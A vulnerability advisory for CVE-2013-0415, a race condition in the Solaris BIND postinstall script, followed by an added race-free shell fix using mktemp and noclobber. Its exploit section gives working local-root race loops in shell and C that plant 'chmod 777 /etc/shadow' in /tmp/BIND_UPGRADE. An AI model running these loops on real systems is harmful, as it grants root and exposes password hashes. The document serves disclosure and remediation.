Oracle Solaris Bind/Postinstall script for Bind package local root

2018.10.05
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 6/10
Impact Subscore: 10/10
Exploitability Subscore: 1.5/10
Exploit range: Local
Attack complexity: High
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Title: Oracle Solaris Bind/Postinstall script for Bind package local root
Author: Larry W. Cashdollar, @_larry0
Date: 2013-01-14
CVE-ID: [CVE-2013-0415]
Download Site: www.oracle.com
Vendor: Oracle Systems
Vendor Notified: 2013-01-15
Vendor Contact: security@oracle.com
Advisory: http://www.vapid.dhs.org/advisories/solaris_patch_cluster_race.html

Description: Solaris Sparc patch cluster January 2013.

Vulnerability: If the system administrator is updating the system using update manager or smpatch (multi user mode), a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.

Vulnerable code in:

    ./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
    ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE

Vulnerable code:

    UPGRADE=${TMP}/BIND_UPGRADE
    rm -f $UPGRADE

(If I create the file first between these two steps, I should have ownership before it is overwritten and inject malicious code to get root.)

    cat >> $UPGRADE <<-\UPDATESTART_METHOD
    oset=$@ # Remember current options if any.
    svc="svc:network/dns/server"
    if [ -z "$TMP" ]; then
    TMP="/tmp"
    fi

Exploit Code:

If the following is run:

    while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done

during patch installation you can get /etc/shadow world writeable.

Vladz suggested:

Another approach to exploit this is to place your evil command in a file called /tmp/BIND_UPGRADE.new, and loop the move command.

    $ while ! mv /tmp/BIND_UPGRADE.new /tmp/BIND_UPGRADE 2>/dev/null; do continue; done

or in C:

    while (rename("/tmp/BIND_UPGRADE.new", "/tmp/BIND_UPGRADE") != 0) continue;

I am telling this because I think that moving a file takes fewer syscalls (one at least) than an "echo string >> file" that has to open(), write() and close() the file.
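A race-free way to write the generated script, shown as an added example that is not part of the original advisory and is not Oracle's packaging code. It assumes a POSIX shell with noclobber (set -C) and a mktemp(1) that supports -d; the function names make_upgrade_script and create_exclusive are hypothetical and the method body is a placeholder.

```shell
#!/bin/sh
# Added example: replaces the racy sequence
#   UPGRADE=${TMP}/BIND_UPGRADE; rm -f $UPGRADE; cat >> $UPGRADE
# Function names are hypothetical; the method body is a placeholder.

# Preferred: write the script inside a private directory.
# The "( ... )" body runs in a subshell, so umask and noclobber
# do not leak into the calling script.
make_upgrade_script() (
    base=${1:-/tmp}
    umask 077
    # mktemp -d picks an unpredictable name and creates the directory
    # atomically with mode 0700, so other users cannot create, rename
    # or replace anything inside it.
    dir=$(mktemp -d "$base/bind_upgrade.XXXXXX") || exit 1
    script=$dir/BIND_UPGRADE
    # noclobber: ">" must create the file itself and fails if the name
    # already exists, instead of appending to it as "cat >>" does.
    set -C
    cat > "$script" <<\UPDATESTART_METHOD || { rm -rf "$dir"; exit 1; }
# placeholder for the generated method body
exit 0
UPDATESTART_METHOD
    printf '%s\n' "$script"
)

# If the fixed path has to be kept: create it exclusively from stdin and
# fail when the name already exists, so a file planted by another user
# is never written to or executed. The caller must abort on failure.
create_exclusive() (
    umask 077
    set -C
    cat > "$1"
) 2>/dev/null
```

A postinstall script would call `UPGRADE=$(make_upgrade_script "${TMP:-/tmp}") || exit 1` and remove the directory once the generated script has run.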

References:

http://www.vapidlabs.com/advisory.php?v=41

